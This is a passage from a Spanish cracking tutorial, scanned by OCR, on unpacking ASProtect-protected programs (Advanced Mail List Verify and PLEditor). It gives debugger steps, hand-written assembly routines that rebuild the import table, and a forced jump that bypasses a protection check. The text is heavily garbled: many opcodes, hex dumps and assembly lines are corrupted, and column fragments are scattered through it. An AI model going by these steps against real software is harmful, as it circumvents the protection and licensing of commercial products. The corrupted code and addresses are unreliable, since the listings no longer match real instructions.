A la altura del call 4B4F10, se ve que EDI contiene la dirección de destino en la sección .rdata y alguna vez EAX o EDX contienen la 
dirección de una función. Será pues interesante mirar un poco este call 4B4F10. No lo voy a analizar, pero os aconsejo leer el ensayo de 
TeeJi que lo hace muy bien. He aquí una pequeña parte: 


0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 
0041 


0041 
0041 


B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F10 
B4F11 
B4F13 
B4F19 
B4F1A 
B4F1B 
B4F1C 
B4F1F 
B4F22 
B4F24 


B4F2A 
B4F2C 


004] 


B4F31 


e 11541 
CA ANI 
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sub_4B 
var_11 
var_1D 
var_1C 
var_18 
var_17 
var_13 
var_12 
var_E 
var_A 
arg_0 
arg_4 


ibutes: 


4F10 


D 


bp-based frame 


proc near 


byte ptr -11Dh 
byte ptr -1Dh 


BRUTINA 


EOh 


= dword ptr -1Ch 

= byte ptr -18h 

= dword ptr -17h 

= byte ptr -13h 

= dword ptr -12h 

= dword ptr -0Eh 

= dword ptr -—0Ah 

= dword ptr 8 

= dword ptr 0Ch 

push ebp 

mov ebp, esp 

add esp, OFFFFE 

push ebx 

push esi 

push edi 

mov edi, [ebp+arg_4] 
mov esi, [ebp+arg_0] 
mov bl, [esi] 

lea eax, [ebp+var_11D] 
xor ecx, ecx 

mov edx, 100h 

Call sub_4A5880 


sub_4B5094+C2_p 


<--= tomad nota de la dirección 


[al 


BP-11D: 


en nuestro caso 6AFC6B 


004B4F36 sub bl, 2 

004B4F39 jz short loc_4B4F49 

004B4F3B sub bl, 2 

004B4F3E jz loc_4B4FE1 

004B4F44 jmp loc_4B5035 

004B4F49 

E A A A A A NS AAA A A A <-- aquí corto una parte 
004B508A 

004B508A loc_4B508A: ; CODE XREF: sub_4B4F10+9A_]3 
004B508A ; sub_4B4F10+B9_]3 

004B508A pop edi 

004B508B pop esi 

004B508C pop ebx 

004B508D mov esp, ebp 

004B508F pop ebp 

004B5090 retn 8 

004B5090 sub_4B4F10 endp 

004B5090 


Bien, aquí he puesto el principio y el final del call (es largo), pero traceando y teniendo en cuenta la dirección indicada, se verá aparecer el 
nombre de la función (la primera es CreateFileA). Se sale del call (para comprender su utilidad, ver el ensayo de TeeJi): aquí el nombre de la 
función está siempre en G6AFC6B. Se puede ver esta dirección a la salida del call en EBP-15D pero esto está aún por verificar. Se obtiene 
pues el nombre de la función deseada, además, el nombre de la DLL asociada aparece haciendo d ebx, y en EDI está la dirección de destino 
en la sección .rdata. Se tiene todo, excepto las funciones encriptadas, entonces como en el capítulo anterior se llama a la función de 
desencriptado (ver el capítulo precedente para saber como localizarla) y se obtiene el nombre de la función. No queda más que un caso por 
tratar, es cuando las funciones son llamadas por su ordinal... vais a ver que contrariamente a Tsehp no me preocupo por ello... 
comprenderéis por qué. 


Bueno, ahora ataquemos a la bestia O . En 4B5156 se desvía el call poniendo un JMP 4B6500 (ver capítulo 39), donde hay espacio libre. A 
continuación, hay que encontrar un espacio de memoria libre para poder escribir el nombre de las funciones, de las DLLs y sus direcciones 
en la sección .rdata. Por mi parte, pongo el código siguiente en 4B6500, el cual se retira después para colocar el call fixer: 


pushad <--= guarda los registros 

push 40 <-- rellena con ceros 

push 00003000 <-- se puede leer,escribir y ejecutar 

push 00008000 <-- tamaño de la memoria reservada 

push 01000000 <-- dirección de la memoria (pongo 1000000 ya 
que no tiene nada pero es aleatorio) 

Call KERNEL32!VirtualAlloc <-- se reserva la memoria 

popad <-- se restauran los registros 


Ahora que tenemos hecha la reserva de memoria en 1000000, vamos a nuestro código en 4B6500 (r eip 4b6500). Se coloca en este lugar el 
call fixer que se va a encargar de copiar los nombres de las funciones, DLLs y direcciones en la sección .rdata en 1000000. He aquí el call 
fixer de Tsehp ligeramente modificado: 


015F:004B6500 ESOBEAFFFE CALL  004B4F10 <-- se restaura el call 

015F:004B6505 60 PUSHAD <-- se guardan los registros 

015F:004B6506 833D6BFC6A0000 CMP DWORD PTR [006AFC6B],00 <-— mira si hay un nombre de 
función 

015F:004B650D 7456 JZ 004B6565 <-- si no lo hay, se va hacia 
el desencriptado / ordinal 

015F:004B650F  6855FEG6A0O PUSH  006AFE55 <-- pone el nombre de la función 

015F:004B6514 FF35F0644B00 PUSH DWORD PTR [004B64F0] <-- la dirección donde se 


quiere copiar (antes de 
ejecutar el bucle hay que 
poner 00000001 en 4B64F0) 
015F:004B651A  E8DDODACBF CALL KERNEL32!1strcpy <-- se copia 
015F:004B651F” FF35F0644B00 PUSH DWORD PTR [004B64F0] <-- se guarda la dirección 


donde está el nombre 


015F:004B6525 E8830EACBF CALL KERNEL32!1strlen <-- se Calcula su longitud 
015F:004B652A 40 INC EAX <-- para añadir un O 
015F:004B652B 43 INC EBX <-- para ponerse al inicio 
del nombre de la DLL 
015F:004B652C  0105F0644B00 ADD [004B64F0],EAX <-- se incrementa la 
dirección de destino 
015F:004B6532 53 PUSH EBX <-- pone el nombre de la DLL 
015F:004B6533  FF35F0644B00 PUSH DWORD PTR [004B64F0] <-- la direc. de destino 
015F:004B6539 ES8BEODACBE CALL KERNEL32!1strcpy <-- se copia 
015F:004B653E FF35F0644B00 PUSH DWORD PTR [004B64F0] <-- se guarda la dirección 
donde está el nombre 
015F:004B6544 E8640EACBF CALL KERNEL32!1lstrlen <-- se calcula su longitud 
015F:004B6549 40 INC EAX <-- para añadir un O 
015F:004B654A 0105F0644B00 ADD [004B64F0],EAX <-- se incrementa la 
dirección de destino 
015F:004B6550 8B0DF0644B00 MOV ECX, [004B64F0] <-- se pone la dirección en ECX 
015F:004B6556 8939 MOV [ECX],EDI <-- y se copia la dirección de 
.rdata que corresponde a la 
función 
015F:004B6558  8305F0644B0005 ADD DWORD PTR [004B64F0],05 <-- se incrementa la 
dirección de destino 
015F:004B655F 61 POPAD <-- se restauran los registros 
015F:004B6560 E9D5EBFFFE JMP 004B513A <-- y se vuelve al bucle de 
Asprotect a la altura de STOSD 
015F:004B6565  3D00000040 CMP EAX, 40000000 <-- EAX contiene la dirección 
de una API 
015F:004B656A  “7D14 JGE 004B6580 <-- hacia el tratamiento por 
ordinal 
015F:004B656C  83F900 CMP ECX,00 <--= ECX == 
015F:004B656F 750F JNZ 004B6580 <--= si: ordinal no: encriptado 
015F:004B6571 FF7001 PUSH DWORD PTR [EAX+01] <-- se pone el parámetro del 
proceso de desencriptado 
015F:004B6574 ES8BBE8FFFE CALL 004B4E34 <-- se desencripta (como se ha 
visto antes, hay que 
poner 3 NOP en 4B4E34+95) 
015F:004B6579 686BFC6ADO PUSH 006AFC6B <-- se pone la dir. del nombre 
015F:004B657E EB94 JMP 004B6514 <-- y se vuelve a la copia 
015F:004B6580 83EE04 SUB ESI,04 <-- si ordinal se pone 4 en ESI 
015F:004B6583 56 PUSH ESI <-- se le pone en la pila 
015F:004B6584 EB8E JMP 004B6514 <-- y se vuelve a la copia 
015F:004B6586 0000 ADD [EAX],AL 
015F:004B6588 0000 ADD [EAX],AL 


Bien, creo que esta función está suficientemente detallada. Es necesario poner un bpm 4b6579 después del call de desencriptado para 
verificar si el nombre del procedimiento está siempre en la misma dirección. Si no lo está, y no está muy lejos (una ojeada con Softlce), se 
reemplaza la dirección y después se puede efectuar el bucle tranquilamente. 


Una vez terminado el bucle, hay que copiar todo lo que está en 1000000 con IceDump, pagein d 1000000 2000 c:noms.dat. A continuación 
Tsehp propone añadir una sección al volcado y poner en ella los nombres (con las direcciones) y escribir un procedimiento que se encargue 
de recuperar cada nombre (u ordinal) y de recuperar la dirección de la función con GetModuleHandle y GetProcAddress (ver su tutorial), y 
después poner esta dirección en .rdata. Haciéndolo así, habríamos reconstruido una falsa tabla de importación y el programa funcionaría. 


Pero la descripción de su método se detiene aquí. En efecto, he cambiado todo esto, no para obtener una falsa tabla de importación para que 
el programa funcione, sino una verdadera, como si no se hubiese tocado el programa ( ningún añadido de sección o de código). Esto es 
posible porque por el momento Asprotect todavía no lo ha destruido todo... en la versión de AMV, veremos después que la última versión 
(PLEditor, Commview...) es más complicado... Empecemos por el principio: 


015F:004B5138  87F1 XCHG EDI,ESI 
015F:004B513A AC LODSB <-- estamos aquí 
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015F:004B513B 08C0 OR AL, AL 
015F:004B513D 74E4 IZ 004B5123 


015F:004B513F  —4E DEC ESI 

015F:004B5140 56 PUSH ESI 

015F:004B5141 53 PUSH EBX 

015F:004B5142  80F802 CMP AL, 02 

015F:004B5145 7407 JZ 004B514E 

015F:004B5147 0FB64E01 MOVZX ECX,BYTE PTR [ESI+01] 

015F:004B514B 41 INC ECX 

015F:004B514C  EBO5 JMP 004B5153 

015F:004B514E  B904000000 MOV ECX, 00000004 

015F:004B5153 41 INC ECX 

015F:004B5154 01CE ADD ESI,ECX 

015F:004B5156 E8B5EFDEFFFF CALL 004B4F10 <-- busca las APIs 
015F:004B515B AB STOSD 

015F:004B515C  EBDC JMP 004B513A <-- vuelve al inicio 
015F:004B515E 61 POPAD 


Nos encontramos en 4B513A y todavía no se ha hecho nada. Veamos como es el inicio de la sección .rdata en este momento: 


0030:00429000 72 B3 02 00 FC B2 02 00-0A B3 02 00 1E B3 02 00. H.ccccooooo..... 
0030:00429010 2E B3 02 00 40 B3 02 00-52 B3 02 00 62 B3 02 00. ....f...R...b... 
0030:00429020 80 B3 02 00 00 00 00 00-2C B4 02 00 11 00 00 80. ........ paria 
0030:00429030 06 00 00 80 3E B4 02 00-56 B4 02 00 6A B4 02 00. ....>...V...J... 
0030:00429040 00 00 00 00 12 B2 02 00-44 B2 02 00 54 B2 02 00. ........ Deia 
0030:00429050 38 B2 02 00 7A B2 02 00-86 B2 02 00 6A B2 02 00. 8...Z....... Ae 
0030:00429060 9%E B2 02 00 AC B2 02 00-90 B2 02 00 22 B2 02 00. ..coooo.oo.... Mass 
0030:00429070 00 00 00 00 58 AB 02 00-66 AB 02 00 76 AB 02 00. ....X...f...V... 


0030:00429080 4C AB 02 00 3E AB 02 00-88 AB 02 00 A8 AB 02 00. L...>........... 
0030:00429090 B8 AB 02 00 C8 AB 02 00-DA AB 02 00 98 AB 02 00. ..ccoooooooo.o.... 
0030:004290A0 F6 AB 02 00 02 AC 02 O0O0-EA AB 02 00 24 AC 02 00. c.cccccoo.o.... SB... 
0030:004290B0 3E AC 02 00 4A AC 02 00-5E AC 02 00 72 AC 02 00. >...J...%*...r... 


En efecto, se encuentran referencias de tipo 2B372 o si se suma la image base 42B372... ¿no parece esto una import address table (en negrita 
los nombres de las funciones)? si, Asprotect no la ha destruido, está como nueva. Miremos un poco más lejos: 


0030:00429300 E2 AF 02 00 CE AF 02 00-C2 AF 02 00 B4 AF 02 00. ...oooooooo..... 
0030:00429310 AO AF 02 00 92 AF 02 00-84 AF 02 00 76 AF 02 00. ....o.o.o.oo.... Vide 
0030:00429320 60 AF 02 00 4A AF 02 00-36 AF 02 00 26 AF 02 00 "...J...6...8... 
0030:00429330 12 AE 02 00 04 AE 02 00-8C B0 02 00 A6 B1 02 00. ..ccocooooooo..... 
0030:00429340 00 00 00 00 D2 B3 02 00-E4 B3 02 00 FA B3 02 00. ...ccoocooooo..... 
0030:00429350 00 00 00 00 14 00 00 80-03 00 00 80 13 00 00 80. .ccocooccooooo..... 
0030:00429360 10 00 00 80 02 00 00 80-12 00 00 80 16 00 00 80. ..ccocooooooo.o.... 
0030:00429370 06 00 00 80 74 00 00 80-73 00 00 80 33 00 00 80. ....t...S...3... 
0030:00429380 OA 00 00 80 11 00 00 80-04 00 00 80 17 00 00 80. ..ooooooooo..... 
0030:00429390 34 00 00 80 00 00 00 00-C6 B2 02 00 DA B2 02 00. AL....oooooo...... 
0030:004293A0 00 00 00 00 00 00 00 00-53 6F 66 74 77 61 72 65. ........ Software 
0030:004293B0 5C 4D 69 63 72 6F 73 6F-66 74 5C 57 41 42 5C 44 AMicrosoftiWABAD 


¿Por qué he puesto 14 00 00 80 en negrita? simplemente, porque aquí también está la tabla de importación, pero no es un vínculo hacia el 
nombre de la función -2, es el ordinal de la función utilizada. Vamos a ver la continuación: en 429000 hay 2B372, así pues normalmente en 
42B372 debería estar la import table (con los nombres y el ordinal de cada función): 


0030:0042B2F0 00 00 00 00 00 00 00 00-00 00 00 00 5B 01 00 00. ..ccooo.oo.... Less 
0030:0042B300 00 00 00 00 00 00 00 00-00 00 7B 01 00 00 00 00. .......... AA 
0030:0042B310 00 00 00 00 00 00 00 00-00 00 00 00 00 00 72 01. ......oooo..... r. 
0030:0042B320 00 00 00 00 00 00 00 00-00 00 00 00 00 00 86 Ol. ...ooooooo...... 
0030:0042B330 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00. ..cocoooooo...... 
0030:0042B340 5F 01 00 00 00 00 00 00-00 00 00 00 00 00 00 00. _.ccccocoo...... 


0030:0042B350 00 00 67 01 00 00 00 00-00 00 00 00 00 00 00 00. ..Q..oooooo...... 
0030:0042B360 00 00 62 01 00 00 00 00-00 00 00 00 00 00 00 00. ..D..co.o....... 
0030:0042B370 00 00 71 01 00 00 00 00-00 00 00 00 00 00 00 00. ..0O...o.oo...... 
0030:0042B380 5E 01 00 00 00 00 00 00-00 00 00 00 00 00 00 00. “..occcoooo...... 
0030:0042B390 00 00 00 00 00 00 00 00-00 00 00 00 00 00 72 00. ...oooooooo.... E, 
0030:0042B3A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00. ..cocoooooo..... 


Aquí no hay nombres de función 6). Pero en 42B372 hay sin embargo 7101 seguido de ceros. Bien, 7101 es el ordinal de la función y justo a 
continuación debería estar el nombre de la función. Esto es así: un word para el ordinal de la función y a continuación el nombre de la 
función. En efecto en la IAT las referencias apuntan hacia el nombre de la función -2. 


Tenemos la IAT correcta y la supuesta conteniendo espacios vacíos con los words que se supone son el ordinal de la función. Es necesario 
verificarlo. Se hace un primer paso por el bucle hasta el call inclusive. Allí, si se mira en 6AFC3B está la función CreateFileA y en EDI hay 
429074. Así pues, se mira en 429074 y hay 58 AB 02 00, o sea, si se le suma la image base (400000 para AMV) se obtiene 42AB38. Vamos 
a ver en 42AB58: 


0042AB58 3400 0000 0000 0000 0000 0000 0000 1A01 A ld a ae 


Bien, en 42AB38 hay 3400 (el ordinal de CrateFileA) y justo el espacio para poner CreateFileA (con un O como carácter de final) antes de 
llegar al ordinal siguiente. O sea: es la IT sin los nombres. 


Así, la idea es hacer un call fixer que se encargue de poner los nombres en sus lugares correspondientes. Y como EDI apunta hacia lo que 
hay en 429xxx, bastará con ver lo que hay y sumarle la image base y será el lugar donde debe estar el nombre de la función -2. Para el caso 
de funciones llamadas por el ordinal, no hay que hacer nada, ya que el ordinal está ya en la IAT. A continuación se volcará esta parte, que se 
unirá al volcado. 


Bien, ahora hay que hacerlo O. Así pues, se vuelve a empezar y se llega de nuevo al inicio del bucle en 4B513A. Aquí se llega hasta el call y 
se desvía de nuevo: 


015F:004B5147 0FB64E01 MOVZX ECX,BYTE PTR [ESI+01] 
015F:004B514B 41 INC ECX 

015F:004B514C  EBO5 JM 004B5153 

015F:004B514E B904000000 MOV ECX,00000004 

015F:004B5153 41 INC ECX 

015F:004B5154 01CE ADD ESI,ECX 

015F:004B5156 E9A5130000 JM 004B6500 <-- se desvía 
015F:004B515B AB STOSD 

015F:004B515C  EBDC JM 004B513A 

015F:004B515E 61 POPAD 


Ahora se puede poner en 4B6500 nuestro fixer: 


015F:004B6500 ES8OBEAFFFE CALL 004B4F10 <-- el call que se ha destruido 
015F:004B6505 60 PUSHAD <-- se guardan los registros 
015F:004B6506 833D6BFC6A0000 CMP DWORD PTR [006AFC6B],00 <-- si no está el 
nombre salta 
015F:004B650D 741C JZ 004B652B <-- y va hacia el encript/ordinal 
015F:004B650F  686BFC6ADO PUSH 006AFC6B <-- se pone el nombre 
015F:004B6514 8BOF MOV ECX, [EDI] <-- se pone la VA señalada por 
EDI en .rdata 
015F:004B6516 81C102004000 ADD ECX, 00400002 <-- se suma a la imagebase + 2 
para pasar al ordinal 
015F:004B651C. 51 PUSH ECX <-- se pone la dirección de 
destino 
015F:004B651D  E8DAODACBF CALL KERNEL32!1strcpy <-- y se copia 
015F:004B6522 61 POPAD <-- se restauran los registros 
015F:004B6523 83C704 ADD EDI, 04 <-- se pasa al siguiente 


tratamiento 


015F:004B6526 E9OFECFFFE JMP 004B513A <-- efectúa el bucle 

015F:004B652B  3D00000040 CMP EAX, 40000000 <-- EAX contiene la dirección 
de una API 

015F:004B6530 “7DFO JGE 004B6522 <-- si es ordinal se pasa al 


siguiente, pues el ordinal 
está ya en la IAT 


015F:004B6532  83F900 CM ECX,00 <--= ECX= O si no, es ordinal 

015F:004B6535 75EB JNZ 004B6522 <-- y se pasa al siguiente 

015F:004B6537 FF7001 PUSH DWORD PTR [EAX+01] <-- o es encrip. y se pasa 

el parámetro a la 

015F:004B653A E8F5ESFFEFE CALL 004B4E34 <-- función de desencrip. 

015F:004B653F 6864FC6A0O PUSH 006AFC64 <-- se busca la dirección del 
nombre que se ha puesto en 
la pila 

015F:004B6544 EBCE JM 004B6514 <-- y se escribe en la IT 


Creo que este procedimiento está bien comentado. De todos modos, hay que poner igualmente 3 NOPs en 4B4E34+95 (el procedimiento de 
desencriptado) y tomar nota de la dirección del nombre al volver de este procedimiento (ver capítulo anterior). 

Antes de entrar en el bucle hay que poner un bpm 4b515€e x para detenerse después del bucle. Una vez que ha terminado es necesario volcar 
toda la parte que ha cambiado: pagein d 429000 2c00 c:import.dat. 


Ahora se toma el volcado del programa (obtenido en el sitio donde cede el turno al programa descomprimido, habiendo puesto JMP EIP, y 
después volcándolo con ProcDump o Procinfos). Si volcáis el programa con IceDump tened en cuenta que se debe reconstruir con 
Perebuilder (con la opción Fix Raw Offset) poniendo directamente el raw offset de cada sección igual a la virtual address. 


Una cosa muy práctica es que la virtual address es igual al raw offset, como se nota fácilmente. Será necesario pegar la importación que se ha 
volcado en el volcado en 29000. Una vez hecho esto el volcado no es aún funcional: en efecto, tenemos la IT (los nombres de las funciones 
con el ordinal), la IAT (vínculos con los nombres de las funciones), pero falta todavía el import descriptor que dice que DLLs son utilizadas. 


Nos toca a nosotros el reconstruirlo. 


Para hacerlo es conveniente dar un vistazo al tutorial de TeeJi sobre como añadir una DLL a la IAT y se comprende mejor de lo que se habla 
O. Bien, empecemos por el principio: como se presenta el import descriptor: 


IMAGE_IMPORT_DESCRIPTOR struct 


OriginalFirstThunk dd O ¡¿RVA to original unbound IAT 
TimeDateStamp dd O ¡not used here 
ForwarderChain dd O ¿not used here 

Name dd O ¡¿RVA to DLL name sring 
FirstThunk dd O ¡¿RVA to IAT array 


IMAGE_IMPORT_DESCRIPTOR ends 


Para una DLL hay 4 dword: el primero corresponde al inicio de la zona de la IAT correspondiente, el segundo no nos interesa, el tercero no 
se utiliza aquí y se pone FFFFFFFE, el cuarto apunta hacia el nombre de la DLL, y el quinto hacia una tabla de dirección (como aquí no la 
hay se pondrá igual al OriginalFirstThunk). 

Bien, comencemos: vamos al inicio de la sección .rdata en 429000 : 


Offset E E 8 9 A BC 0D E E 


00029000 72 B3 02 00 FC B2 02 00 OA B3 02 00 1E B3 02 00 E 


00029010 2E B3 02 00 40 B3 02 00 52 B3 02 00 62 B3 02 00 A E A IE 
00029020 80 B3 02 00 00 00 00 00  2C B4 02 00 11 00 00 80 EP q € 
00029030 06 00 00 80 3E B4 02 00. 56 B4 02 00 6A B4 02 00 E ES E 
00029040 00 00 00 00 12 B2 02 00 44 B2 02 00 54 B2 0200... ..... ta Dit ón 


00029050 38 B2 02 00 7A B2 02 00 86 B2 02 00 6A B2 02 00 A 
00029060 9E B2 02 00 AC B2 02 00 90 B2 02 00 22 B2 02 00 DI AN 


He aquí como se encuentran las DLLs utilizadas: al principio de la sección en 29000 hay una serie de vínculos hacia los nombres-2. He 
seleccionado 17 ya que justo a continuación hay 00 00 00 00. Esto permite decir que el programa llama a 17 funciones de estas DLLs. Se 
sabe ya que el OriginalFirstThunk es 29000. El nombre de la DLL se puede poner en cualquier parte, pero es mejor hacerlo aquí: El primer 
vínculo es 2B372, procedamos: 


Offset Ole 2 A o A 8 9 ¿An ¿Br Dr Es E 


0002B350 41 00 67 01 52 65 67 45 6ÉE 75 6D 4B 65 79 45 78 A.g.RegEnumKeyEx 
0002B360 41 00 62 01 52 65 67 44 65 6C 65 74 65 4B 65 79 A.b.RegDeleteKey 
0002B370 41 00 71 01 52 65 67 4F 70 65 6E 4B 65 79 41 00 A.q.RegOpenKeyA. 
0002B380 5E 01 52 65 67 43 72 65 61 74 65 4B 65 79 41 00 *.RegCreateKeyA. 
0002B390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 72 00. .......oo...... 5 
0002B3A0 53 68 65 6C 6C 45 78 65 63 75 74 65 41 00 00 00 ShellExecuteA... 


La dirección 2B390 se encuentra llena de 00, y encima se encuentran los nombres de las funciones de las DLLs, señalados por la parte de la 
IAT seleccionada. Estas funciones proceden de Advapi.dll. Así, en 2B390 se pone advapi.dll y con ello, el nombre de la DLL estará en 
2B390. Si no se encuentran los nombres de las DLLs utilizadas, la prog import list da por orden las funciones, con su DLL asociada. Ahora 
se pasa a 29020 y se continua con la DLL siguiente. Por lo que respecta a Ordinales resulta que en este programa es por wsock32.dll (se la 
puede encontrar a la altura del bucle que se ha hecho y poniendo un breakpoint a la altura del tratamiento del ordinal y se verán la/las DLL(s) 
correspondientes). Para escribir el import descriptor se elige un lugar libre, he aquí el mío reconstruido: 


Offset ES E. ED 9.098 A BC DE ¿E 
0002A800 00 90 02 00 00 00 00 00 FF FF FF FF 90 B3 02 00 as Vyyy*?.. 
0002A810 00 90 02 00 28 90 02 00 00 00 00 00 EF EF EF EF O AA VVVY 


0002A820  7B B4 02 00 28 90 02 00 44 90 02 00 00 00 00 00  (“..(*..D+...... 
0002A830 FF FF FF FF BC B2 02 00 44 90 02 00 74 90 02 00  yyyy4?..De..te.. 


0002A840 00 00 00 00 FF FF FF FF 2F AD 02 00 74 90 02 00 VVS 
0002A850 04 92 02 00 00 00 00 00 FF FF FF FF AE B3 02 00 ate VYyy0O?.. 
0002A860 04 92 02 00 0C 92 02 00 00 00 00 00 EF EF FEF FEF ES E VVVy 
0002A870 05 B2 02 00 0C 92 02 00 44 93 02 00 00 00 00 00 A > AA 
0002A880 FF FF FF FF 14 B4 02 00 44 93 02 00 54 93 02 00 VIVYV. DT 
0002A890 00 00 00 00 FF FF FF FF DO A8 02 00 54 93 02 00 Ln AV Y VD, ss 
0002A8A0 98 93 02 00 00 00 00 00 FF FF FF FF ED B2 02 00 AA vyyyí?.. 


0002A8B0 98 93 02 00 00 00 00 00 00 00 00 00 00 00 00 00 Maia 
0002A8C0 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00. ..cocoocooooo.... 
0002A8D0 57 53 4F 43 4B 33 32 2E 44 4C 4C 00 00 00 00 00 

WSOCK32.DLL..... 


He señalado las diferentes partes, aquí el programa utiliza 8 DLLs. Ahora, para que el volcado sea operativo, es necesario cambiar la import 
address RVA (con PEditor) en 2A800, y asimismo, poner el EIP original, el que se encuentra en el momento en que el programa cede el 
turno al programa descomprimido (aquí 421B.FC). 


Bien, pero AMV no funcionará ¿por qué? recordad que anteriormente he dicho que se ponía una dirección de Asprotect en la tabla de 
importación, que serviría para un desencriptado si se tiene la clave. En efecto, hace una llamada a GetProcAddress al pasar por un punto 
donde pone este valor. Así nuestro fixer ha puesto como valor para esto una referencia a GetProcAddress, y si el volcado no funciona es que 
por el paso al proceso de desencriptado hace una llamada a GetProcAddress, cuando debería poner un valor. Veamos el mensaje de error que 
aparece a la ejecución del volcado: 


Crypt API not found. Please re-install 


Se desensambla y se llega aquí: 


00417620 3 iii SUBRUOTINA parada A 
00417620 

00417620 

00417620 sub_417620 proc near ; CODE XREF: _WinMaine16+EB_p 


00417620 push 4 


00417622 push 0FFFFFFFEh 

00417624 Call ds:off_4290C8 

0041762A test eax, eax 

0041762C mov ds:dword_433758, eax 

00417631 jnz short loc_417649 <-- se fuerza 

00417633 push 10h 

00417635 push offset aAdvancedMailLi ; "Advanced Mail List Verify" 
<-- no es bueno 

0041763A push offset aCryptApiNotFou ; "Crypt API not found. Please re- 
install "... 

0041763F push eax 

00417640 Call ds:dword_4292E8 

00417646 xor eax, eax 

00417648 retn 

D0M1 7689 3 

00417649 

00417649 loc_417649: ; CODE XREF: sub_417620+11_]3 

00417649 mov eax, 1 

0041764E retn 


Para evitar este mensaje de error y con él, la finalización del programa es suficiente con forzar el salto en 417361 y ya está hecho. Ahora el 
volcado es completamente funcional y como nuevo O . Ciertamente hay aún una pequeña parte encriptada a falta de la clave... pero bien, 
hemos obtenido un volcado con una verdadera tabla de importación. 


Bien, si he descrito el principio del método de Tsehp es porque gracias a él, he podido elaborar este método, y hacía falta saber el nombre de 
las funciones... 


VI_4* método: PLEditor 


Lo que sería interesante es que el método anterior funcionara también con PLEditor (siendo que está protegido con una versión más reciente 
de Asprotect). Desgraciadamente no funciona, ya que ni la IAT ni la IT no existen, no hay más que 00. Sin embargo ¿es imposible alcanzar 
el mismo objetivo que anteriormente? no, pero habrá que poner a punto un método que va a crear una IAT, una IT y ¿por qué no? al mismo 
tiempo el import descriptor. Pero ¿cómo puede hacerse? es muy simple, ahora no se va a escribir un call fixer sino un import table rebuilder. 
¿Cómo es posible? muy sencillo, porque Asprotect se traiciona a sí mismo... Está obligado a poner estos vínculos hacia las funciones (que 
haya un encriptado o simplemente un JMP no tiene importancia) en el mismo lugar donde debía encontrarse originalmente. En efecto, 
supongamos que en 429000 hay un vínculo hacia la API CreateFileA, entonces el programa llamará a lo que haya en 429000: 
CALL[429000] y como esto forma parte de la import table, Windows se encargará de reemplazarlo por la dirección de CreateFileA. Así 
pues, si Asprotect quiere reconstruir una import table, encriptada o cualquier otra cosa, está obligado a que lo que vinculará el programa a 
CreateFileA esté situado en 429000. Y así es como podremos llegar a reconstruir una IAT, IT y el import descriptor. 


Bien, ahora pongámoslo en práctica. Se ejecuta PLEditor, se tracea, se quita el anti-debugger y se llega a este famoso bucle (ver como se 
llega en los capítulos precedentes): 


015F:00555392 AC LODSB 

015F:00555393 08C0 OR AL,AL 

015F:00555395 74E4 JZ 0055537B 
015F:00555397  4E DEC ESI 

015F:00555398 56 PUSH ESI 

015F:00555399 53 PUSH EBX 

015F:0055539A 80F802 CMP AL, 02 

015F:0055539D 7407 JZ 005553A6 
015F:0055539F 0FB64E01 MOVZX ECX,BYTE PTR [ESI+01] 
015F:005553A3 41 INC ECX 

015F:005553A4 EBO5 JMP 005553AB 
015F:005553A6 B904000000 MOV ECX, 00000004 
015F:005553AB 41 INC ECX 

015F:005553AC  01CE ADD ESI,ECX 
015F:005553AE E8B5FDFFFE CALL 00555168 <-- se desvía el call mediante 


jmp 556700 


015F:005553B3 AB STOSD 

015F:005553B4 EBDC JMP 00555392 
015F:005553B6 61 POPAD 

015F:005553B7  837D0800 CMP DWORD PTR [EBP+08],00 
015F:005553BB 7509 JNZ 005553C6 


Como anteriormente, se desvía el call hacia un lugar libre, en este caso 556700. Ahora voy a intentar explicar el principio de este importante 
rebuilder. Supongamos que Asprotect quiere poner su vínculo en 4B8000 y ocupará un espacio para poner nuestra IT (los nombres ) en 
4B8950 (por ejemplo) y escribe el nombre en 4B8950+2 (para administrar el ordinal que en este caso no existe) y se pone en 4B8000 un 
vínculo hacia 4B8950-image base ( en este caso B8950, ya que la image base es 400000) . A continuación, para el caso en que la función es 
llamada por el ordinal, pondrá directamente el ordinal en 4B8000 (a dirección a la que apunta Asprotect) y se pone en la IAT, pero para que 
Windows la reconozca será necesario añadir 80000000 para que sepa que es un ordinal y no la dirección del nombre de la función-2. Por lo 
que respecta al import descriptor, se reconstruirá en base a que EAX contiene una referencia al nombre de la DLL en curso, será suficiente 
comparar EBX a cada paso con su valor precedente para saber si se está siempre en la misma parte del import descriptor. Si no es así se 
reconstruirá una estructura: 


IMAGE_IMPORT_DESCRIPTOR struct 
OriginalFirstThunk dd 0 ¿inicio de la zona donde van a escribirse los nombres para 
esta estructura 


TimeDateStamp dd 0 ¿se pone 00000000 

ForwarderChain dd 0 ¡se pone FEFFFFFF 

Name dd 0 ¡se escribe el nombre de la DLL con con el nombre de las 
funciones y se pone un vínculo con este nombre 

FirstThunk dd 0 ¡se le pone igual al OriginalFirstThunk 


IMAGE_IMPORT_DESCRIPTOR ends 


Ya sé que esto sólo está explicado muy por encima, pero no sé demasiado bien cómo decirlo... 
Ahora se puede poner en 556700 el import rebuilder (no está nada optimizado pero funciona bien O): 


015F:00556700  E863EAFFFE CALL 00555168 <-- se restaura el call 
015F:00556705 60 PUSHAD <-- se guardan los registros 
015F:00556706 391DFC665500 CMP [005566FC],EBX <-- siempre en la misma 


estructura del 
import descriptor 


015F:0055670C. 7470 JZ 0055677E <-- se pasa a la continuación 
015F:0055670E 60 PUSHAD 
015F:0055670F  891DFC665500 MOV [005566FC],EBX <-- se pone EBX (apunta al 
nombre de la DLL) en una 
variable 
015F:00556715 8B15F4665500 MOV EDX, [005566F4] <-- se pone la dirección 
actual de la IAT en EDX 
015F:0055671B  893A MOV [EDX] ,EDI <-- se pone el contenido de EDI 
(es decir el inicio de la 
IAT correspondiente) 
015F:0055671D 812A00004000 SUB DWORD PTR [EDX],00400000 <-- se resta el valor 
de la image base 
015F:00556723 8305F466550008 ADD DWORD PTR [005566F4],08 <-- se actualiza el 
puntero hacia el IAD 
